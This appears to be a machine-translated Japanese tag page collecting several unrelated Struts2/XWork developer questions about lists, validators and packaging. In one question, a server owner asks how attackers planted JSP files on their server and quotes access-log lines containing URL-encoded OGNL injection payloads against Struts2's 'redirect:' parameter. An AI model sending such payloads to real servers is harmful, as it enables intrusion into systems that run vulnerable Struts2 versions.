問題タブ [xwork]

表形式の入力これは、配列のサイズが不明で間にギャップがある場合に、 のXWorkList代わりに使用することを提案します。ArrayList

しかし、ドキュメントXWorkListによると、ジェネリックではなく、空のコンストラクターはありません。

私の質問はXWorkList、リストにいくつかのアイテムが欠けている豆のリストをどのように使用するか、提出する方法はありますか?

サンプル HTML:

tomcat 7x と Apache 2.2 を tomcat の前面に配置して、パブリック ドメインで struts2 アプリをホストしようとしました。

Web アプリ フォルダーで悪意のあるアクティビティが見られます。

indcx.jsp、maneger.jsp、uplod.jsp などのいくつかのファイルと、そのような多くの不明なファイルが tomcat/webapp/application フォルダーにアップロードされるのを見るたびに。

私は毎回これらのファイルを手動で削除していますが、そのような悪意のある/ハッカーの活動やそのような未知のファイルのアップロードを回避できる設定または構成があるかどうかを知りたい.

編集

そのようなファイルをもう一度見ましたが、ファイルの内容は次のとおりです

私の質問は、誰かがこのファイルを私のサーバーにアップロードするにはどうすればよいですか?

再編集

綿密な分析の結果、これは struts2 または xwork のセキュリティの問題または脆弱性であることがわかりました。残りのストーリーのほとんどを示すすべてのログを次に示します。

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2. dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter() .println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

Web アプリケーションの作成方法を学習しようとしていますが、xwork と webwork を使用しています。フロントエンドのフリーマーカー。私のアプリケーション(MyTestApp.war)は、.classファイルをそのままclasses/ディレクトリに入れると正常に動作します。このように-classe/com/prg/hworld/HelloWorld.classですが、同じファイルですが、jarを作成してclasses/ディレクトリに配置すると、このエラーが発生します。

アクション クラス [com.prg.hworld.HelloWorld] が見つかりません。アクション [hello] をスキップします)

manefest.mf に jar 名を追加しましたが、それでも同じエラーが発生します.. pls は彼女を助けてくれます..

ValueStackJSPでJSP ELを使用して、フィールドエラー(バリデーターインターセプターによって入れられる)にアクセスできるかどうか迷っていますか?

org.springframework.jms.listener.SimpleMessageListenerContainer以前のバージョン(2.3.16より前)では にキャストできると思いますcom.opensymphony.xwork2.inject.Container。その後、次のエラーが発生します....

LongRangeFieldValidator私はStruts2で注釈を使用して検証に取り組んでいましたが、xmlを使用して行われた検証には場所があるため、注釈に場所がないことに非常に驚きましたLongRangeFieldValidator

LongRangeFieldValidor注釈を使用して取得するさまざまな方法を試しました。

1. LongRangeFieldValidator. 実際には存在せずcom.opensymphony.xwork2.validator.validators.LongRangeFieldValidator、型に変換できないため、エラーが表示されましたAnnotation。これはかなり明白だったので、次に切り替えました。

2. 使用しIntRangeFieldValidatorました。型キャストができなかったので、かなり使えました。ドキュメントには数値型用であると書かれているので、これはうまくいくはずだと思いました。

3. DoubleRangeFieldValidatorこれは非整数値も検証する（そしてそうすべきである）ため、これを削除する必要がありました。

4. long最後に、フィールドをに変換し、Stringを使用する必要がありましたRegexFieldValidator。

LongRangeFieldValidator私の質問は、パッケージにが含まれていない理由com.opensymphony.xwork2.validator.annotationsと、それを取得するためのベスト プラクティスは何ですか?

開始日と終了日を入力するページがあります。Xwork Validator を使用して同じことを実装しようとしていますが、動作していないため、終了日が開始日よりも前であってはならないことを検証する必要があります。以下はコードです

最初の 2 つの検証は機能していますが、「fieldexpression」ではありません

Struts の使用: 2.0.11

一部のページでは、アプリケーションの Struts 検証を無視するシナリオがあります。ページの流れがあります。ユーザーは 1 つのページを完了し、[次へ] ボタンをクリックして別のページに進みます。[次へ] をクリックすると、必須要素の検証チェックが行われ、正常に機能しています。

同じページに「戻る」ボタンがあり、そのボタンをクリックすると、ユーザーは前のページに移動します。必須要素が入力されていない場合でも、ユーザーは前のページに移動できるようにする必要があります。しかし、私の場合、必須チェックは停止しています。

私はStruts Validation Frameの作業を使用しています。ページにAdminWorkFlow-Validation.xml必要なすべての検証を含むファイルがあります。

[戻る] ボタンをクリックしたときに検証チェックを無視する方法。

Struts 2.0.11 および